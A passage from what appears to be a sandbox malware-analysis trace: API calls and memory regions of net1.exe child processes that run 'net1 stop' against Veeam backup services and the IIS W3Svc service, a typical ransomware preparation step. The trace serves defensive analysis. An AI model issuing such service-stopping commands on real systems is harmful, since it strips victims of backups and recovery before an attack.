_wcsicmp (_String1="workstation", _String2="VEEAMRESTSVC") returned 1 [0119.872] _wcsicmp (_String1="work", _String2="VEEAMRESTSVC") returned 1 [0119.872] _wcsicmp (_String1="wksta", _String2="VEEAMRESTSVC") returned 1 [0119.872] _wcsicmp (_String1="prdr", _String2="VEEAMRESTSVC") returned -6 [0119.872] _wcsicmp (_String1="devrdr", _String2="VEEAMRESTSVC") returned -18 [0119.872] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMRESTSVC") returned -10 [0119.872] _wcsicmp (_String1="server", _String2="VEEAMRESTSVC") returned -3 [0119.872] _wcsicmp (_String1="svr", _String2="VEEAMRESTSVC") returned -3 [0119.872] _wcsicmp (_String1="srv", _String2="VEEAMRESTSVC") returned -3 [0119.872] _wcsicmp (_String1="lanmanserver", _String2="VEEAMRESTSVC") returned -10 [0119.872] _wcsicmp (_String1="alerter", _String2="VEEAMRESTSVC") returned -21 [0119.872] _wcsicmp (_String1="netlogon", _String2="VEEAMRESTSVC") returned -8 [0119.872] NetServiceControl (in: servername=0x0, service="VEEAMRESTSVC", opcode=0x0, arg=0x0, bufptr=0x24fa50 | out: bufptr=0x24fa50) returned 0x889 [0119.873] wcscpy_s (in: _Destination=0xff8a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0119.873] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0119.873] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0119.875] GetFileType (hFile=0xb) returned 0x2 [0119.875] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f918 | out: lpMode=0x24f918) returned 1 [0119.875] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24f910, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x24f910*=0x1e) returned 1 [0119.875] GetFileType (hFile=0xb) returned 0x2 [0119.875] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f918 | out: lpMode=0x24f918) returned 1 [0119.875] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f910, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x24f910*=0x2) returned 1 [0119.876] _ultow (in: _Dest=0x889, _Radix=2423168 | out: _Dest=0x889) returned="2185" [0119.876] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0119.876] GetFileType (hFile=0xb) returned 0x2 [0119.876] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f918 | out: lpMode=0x24f918) returned 1 [0119.876] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f910, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x24f910*=0x34) returned 1 [0119.876] GetFileType (hFile=0xb) returned 0x2 [0119.877] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f918 | out: lpMode=0x24f918) returned 1 [0119.877] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f910, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x24f910*=0x2) returned 1 [0119.877] NetApiBufferFree (Buffer=0xc4d50) returned 0x0 [0119.877] NetApiBufferFree (Buffer=0xcc100) returned 0x0 [0119.877] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamRESTSvc /y" [0119.877] exit (_Code=2) Process: id = "359" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x4feb6000" os_pid = "0xa3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "352" os_parent_pid = "0x920" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamTransportSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12625 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12626 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12627 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12628 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 12629 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12630 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12631 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12632 start_va = 0xff880000 end_va = 0xff8b2fff entry_point = 0xff880000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12633 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12634 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12635 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 12636 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12637 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12638 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12639 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 12640 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12641 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12642 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12643 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12644 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12645 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 12646 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 12647 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12648 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12649 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12650 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12651 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12652 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12653 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12654 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12655 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12656 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12657 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12658 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12659 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12660 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12661 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12662 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12721 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 897 os_tid = 0x8d4 [0119.794] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fd10 | out: lpSystemTimeAsFileTime=0x20fd10*(dwLowDateTime=0xfc877bb0, dwHighDateTime=0x1d48689)) [0119.794] GetCurrentProcessId () returned 0xa3c [0119.794] GetCurrentThreadId () returned 0x8d4 [0119.794] GetTickCount () returned 0x27992 [0119.794] QueryPerformanceCounter (in: lpPerformanceCount=0x20fd18 | out: lpPerformanceCount=0x20fd18*=1816671200000) returned 1 [0119.795] GetModuleHandleW (lpModuleName=0x0) returned 0xff880000 [0119.795] __set_app_type (_Type=0x1) [0119.795] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff899c9c) returned 0x0 [0119.795] __getmainargs (in: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788, _DoWildCard=0, _StartInfo=0xff8a479c | out: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788) returned 0 [0119.795] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.795] GetConsoleOutputCP () returned 0x1b5 [0119.796] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8acec0 | out: lpCPInfo=0xff8acec0) returned 1 [0119.796] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0119.798] sprintf_s (in: _DstBuf=0x20fcb8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0119.798] setlocale (category=0, locale=".437") returned="English_United States.437" [0119.879] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0119.879] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0119.879] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamTransportSvc /y" [0119.879] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20fa50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0119.879] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0119.879] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fca8 | out: Buffer=0x20fca8*=0x3f4d60) returned 0x0 [0119.879] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fca8 | out: Buffer=0x20fca8*=0x3fc120) returned 0x0 [0119.879] _fileno (_File=0x7fefdba2a80) returned 0 [0119.879] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0119.879] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0119.879] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0119.879] _wcsicmp (_String1="config", _String2="stop") returned -16 [0119.879] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0119.879] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0119.879] _wcsicmp (_String1="file", _String2="stop") returned -13 [0119.879] _wcsicmp (_String1="files", _String2="stop") returned -13 [0119.879] _wcsicmp (_String1="group", _String2="stop") returned -12 [0119.879] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0119.880] _wcsicmp (_String1="help", _String2="stop") returned -11 [0119.880] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0119.880] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0119.880] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0119.880] _wcsicmp (_String1="session", _String2="stop") returned -15 [0119.880] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0119.880] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0119.880] _wcsicmp (_String1="share", _String2="stop") returned -12 [0119.880] _wcsicmp (_String1="start", _String2="stop") returned -14 [0119.880] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0119.880] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0119.880] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0119.880] _wcsicmp (_String1="accounts", _String2="VeeamTransportSvc") returned -21 [0119.880] _wcsicmp (_String1="computer", _String2="VeeamTransportSvc") returned -19 [0119.880] _wcsicmp (_String1="config", _String2="VeeamTransportSvc") returned -19 [0119.880] _wcsicmp (_String1="continue", _String2="VeeamTransportSvc") returned -19 [0119.880] _wcsicmp (_String1="cont", _String2="VeeamTransportSvc") returned -19 [0119.880] _wcsicmp (_String1="file", _String2="VeeamTransportSvc") returned -16 [0119.880] _wcsicmp (_String1="files", _String2="VeeamTransportSvc") returned -16 [0119.880] _wcsicmp (_String1="group", _String2="VeeamTransportSvc") returned -15 [0119.880] _wcsicmp (_String1="groups", _String2="VeeamTransportSvc") returned -15 [0119.880] _wcsicmp (_String1="help", _String2="VeeamTransportSvc") returned -14 [0119.880] _wcsicmp (_String1="helpmsg", _String2="VeeamTransportSvc") returned -14 [0119.880] _wcsicmp (_String1="localgroup", _String2="VeeamTransportSvc") returned -10 [0119.880] _wcsicmp (_String1="pause", _String2="VeeamTransportSvc") returned -6 [0119.880] _wcsicmp (_String1="session", _String2="VeeamTransportSvc") returned -3 [0119.880] _wcsicmp (_String1="sessions", _String2="VeeamTransportSvc") returned -3 [0119.880] _wcsicmp (_String1="sess", _String2="VeeamTransportSvc") returned -3 [0119.880] _wcsicmp (_String1="share", _String2="VeeamTransportSvc") returned -3 [0119.880] _wcsicmp (_String1="start", _String2="VeeamTransportSvc") returned -3 [0119.880] _wcsicmp (_String1="stats", _String2="VeeamTransportSvc") returned -3 [0119.880] _wcsicmp (_String1="statistics", _String2="VeeamTransportSvc") returned -3 [0119.880] _wcsicmp (_String1="stop", _String2="VeeamTransportSvc") returned -3 [0119.880] _wcsicmp (_String1="time", _String2="VeeamTransportSvc") returned -2 [0119.880] _wcsicmp (_String1="user", _String2="VeeamTransportSvc") returned -1 [0119.880] _wcsicmp (_String1="users", _String2="VeeamTransportSvc") returned -1 [0119.880] _wcsicmp (_String1="msg", _String2="VeeamTransportSvc") returned -9 [0119.880] _wcsicmp (_String1="messenger", _String2="VeeamTransportSvc") returned -9 [0119.880] _wcsicmp (_String1="receiver", _String2="VeeamTransportSvc") returned -4 [0119.880] _wcsicmp (_String1="rcv", _String2="VeeamTransportSvc") returned -4 [0119.880] _wcsicmp (_String1="netpopup", _String2="VeeamTransportSvc") returned -8 [0119.880] _wcsicmp (_String1="redirector", _String2="VeeamTransportSvc") returned -4 [0119.881] _wcsicmp (_String1="redir", _String2="VeeamTransportSvc") returned -4 [0119.881] _wcsicmp (_String1="rdr", _String2="VeeamTransportSvc") returned -4 [0119.881] _wcsicmp (_String1="workstation", _String2="VeeamTransportSvc") returned 1 [0119.881] _wcsicmp (_String1="work", _String2="VeeamTransportSvc") returned 1 [0119.881] _wcsicmp (_String1="wksta", _String2="VeeamTransportSvc") returned 1 [0119.881] _wcsicmp (_String1="prdr", _String2="VeeamTransportSvc") returned -6 [0119.881] _wcsicmp (_String1="devrdr", _String2="VeeamTransportSvc") returned -18 [0119.881] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamTransportSvc") returned -10 [0119.881] _wcsicmp (_String1="server", _String2="VeeamTransportSvc") returned -3 [0119.881] _wcsicmp (_String1="svr", _String2="VeeamTransportSvc") returned -3 [0119.881] _wcsicmp (_String1="srv", _String2="VeeamTransportSvc") returned -3 [0119.881] _wcsicmp (_String1="lanmanserver", _String2="VeeamTransportSvc") returned -10 [0119.881] _wcsicmp (_String1="alerter", _String2="VeeamTransportSvc") returned -21 [0119.881] _wcsicmp (_String1="netlogon", _String2="VeeamTransportSvc") returned -8 [0119.881] _wcsupr (in: _String="VeeamTransportSvc" | out: _String="VEEAMTRANSPORTSVC") returned="VEEAMTRANSPORTSVC" [0119.881] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3fce30 [0119.884] GetServiceKeyNameW (in: hSCManager=0x3fce30, lpDisplayName="VEEAMTRANSPORTSVC", lpServiceName=0xff8a5750, lpcchBuffer=0x20fbc8 | out: lpServiceName="", lpcchBuffer=0x20fbc8) returned 0 [0119.885] _wcsicmp (_String1="msg", _String2="VEEAMTRANSPORTSVC") returned -9 [0119.885] _wcsicmp (_String1="messenger", _String2="VEEAMTRANSPORTSVC") returned -9 [0119.885] _wcsicmp (_String1="receiver", _String2="VEEAMTRANSPORTSVC") returned -4 [0119.885] _wcsicmp (_String1="rcv", _String2="VEEAMTRANSPORTSVC") returned -4 [0119.885] _wcsicmp (_String1="redirector", _String2="VEEAMTRANSPORTSVC") returned -4 [0119.885] _wcsicmp (_String1="redir", _String2="VEEAMTRANSPORTSVC") returned -4 [0119.885] _wcsicmp (_String1="rdr", _String2="VEEAMTRANSPORTSVC") returned -4 [0119.885] _wcsicmp (_String1="workstation", _String2="VEEAMTRANSPORTSVC") returned 1 [0119.886] _wcsicmp (_String1="work", _String2="VEEAMTRANSPORTSVC") returned 1 [0119.886] _wcsicmp (_String1="wksta", _String2="VEEAMTRANSPORTSVC") returned 1 [0119.886] _wcsicmp (_String1="prdr", _String2="VEEAMTRANSPORTSVC") returned -6 [0119.886] _wcsicmp (_String1="devrdr", _String2="VEEAMTRANSPORTSVC") returned -18 [0119.886] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMTRANSPORTSVC") returned -10 [0119.886] _wcsicmp (_String1="server", _String2="VEEAMTRANSPORTSVC") returned -3 [0119.886] _wcsicmp (_String1="svr", _String2="VEEAMTRANSPORTSVC") returned -3 [0119.886] _wcsicmp (_String1="srv", _String2="VEEAMTRANSPORTSVC") returned -3 [0119.886] _wcsicmp (_String1="lanmanserver", _String2="VEEAMTRANSPORTSVC") returned -10 [0119.886] _wcsicmp (_String1="alerter", _String2="VEEAMTRANSPORTSVC") returned -21 [0119.886] _wcsicmp (_String1="netlogon", _String2="VEEAMTRANSPORTSVC") returned -8 [0119.886] NetServiceControl (in: servername=0x0, service="VEEAMTRANSPORTSVC", opcode=0x0, arg=0x0, bufptr=0x20fbd0 | out: bufptr=0x20fbd0) returned 0x889 [0119.886] wcscpy_s (in: _Destination=0xff8a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0119.886] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0119.887] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0119.888] GetFileType (hFile=0xb) returned 0x2 [0119.889] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fa98 | out: lpMode=0x20fa98) returned 1 [0119.889] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x20fa90, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x20fa90*=0x1e) returned 1 [0119.889] GetFileType (hFile=0xb) returned 0x2 [0119.889] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fa98 | out: lpMode=0x20fa98) returned 1 [0119.889] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fa90, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x20fa90*=0x2) returned 1 [0119.890] _ultow (in: _Dest=0x889, _Radix=2161408 | out: _Dest=0x889) returned="2185" [0119.890] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0119.890] GetFileType (hFile=0xb) returned 0x2 [0119.890] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fa98 | out: lpMode=0x20fa98) returned 1 [0119.890] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x20fa90, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x20fa90*=0x34) returned 1 [0119.890] GetFileType (hFile=0xb) returned 0x2 [0119.890] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fa98 | out: lpMode=0x20fa98) returned 1 [0119.891] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fa90, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x20fa90*=0x2) returned 1 [0119.891] NetApiBufferFree (Buffer=0x3f4d60) returned 0x0 [0119.891] NetApiBufferFree (Buffer=0x3fc120) returned 0x0 [0119.891] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamTransportSvc /y" [0119.891] exit (_Code=2) Process: id = "360" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x510ea000" os_pid = "0xad4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "353" os_parent_pid = "0x9a0" cmd_line = "C:\\Windows\\system32\\net1 stop W3Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12663 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12664 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12665 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12666 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 12667 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12668 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12669 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12670 start_va = 0xff880000 end_va = 0xff8b2fff entry_point = 0xff880000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12671 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12672 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12673 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 12674 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12675 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12676 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12677 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 12678 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12679 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12680 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12681 start_va = 0x7fefd920000 end_va = 